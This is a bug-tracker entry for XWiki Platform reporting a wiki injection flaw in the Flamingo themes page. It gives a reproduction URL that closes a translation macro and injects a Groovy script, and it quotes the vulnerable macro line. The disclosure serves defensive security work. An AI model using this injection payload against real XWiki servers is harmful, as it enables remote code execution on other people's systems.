Uploaded image for project: 'XWiki Platform'
  1. XWiki Platform
  2. XWIKI-19757

Possible wiki injection through translation macro parameters located in FlamingoThemesCode.WebHomeSheet

    XMLWordPrintable

Details

    • Unit
    • High
    • Unknown
    • N/A
    • N/A

    Description

      To reproduce:

      http://127.0.0.1:8080/xwiki/bin/view/FlamingoThemesCode/WebHomeSheet?newThemeName=foo%22%2F%7D%7D%7B%7Basync%20async%3D%22true%22%20cached%3D%22false%22%20context%3D%22doc.reference%22%7D%7D%7B%7Bgroovy%7D%7Dprintln(%22hello%20from%20groovy!%22)%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D&form_token=1&action=create

      This actually execute a groovy macro injected in the URL as part of the error message that was supposed to print the theme name.

      That page contains the following code (executed when passing an invalid form token):

      {{translation key="platform.flamingo.themes.home.create.csrf" parameters="$request.newThemeName" /}}

      This makes it possible to inject any wiki content by providing a value which close the translation macro and start anything else.

      Attachments

        Issue Links

          is related to

          Bug - A problem which impairs or prevents the functions of the product. XWIKI-19746 Privilege escalation (PR) with view rights on XWiki.XWikiServerClassSheet

          • Blocker - Blocks development and/or testing work, production could not run.
          • Closed
          links to

          Web Link Github Security advisory

          Activity

            People

              mleduc Manuel Leduc
              tmortagne Thomas Mortagne
              Votes:
              0 Vote for this issue
              Watchers:
              1 Start watching this issue

              Dates

                Created:
                Updated:
                Resolved: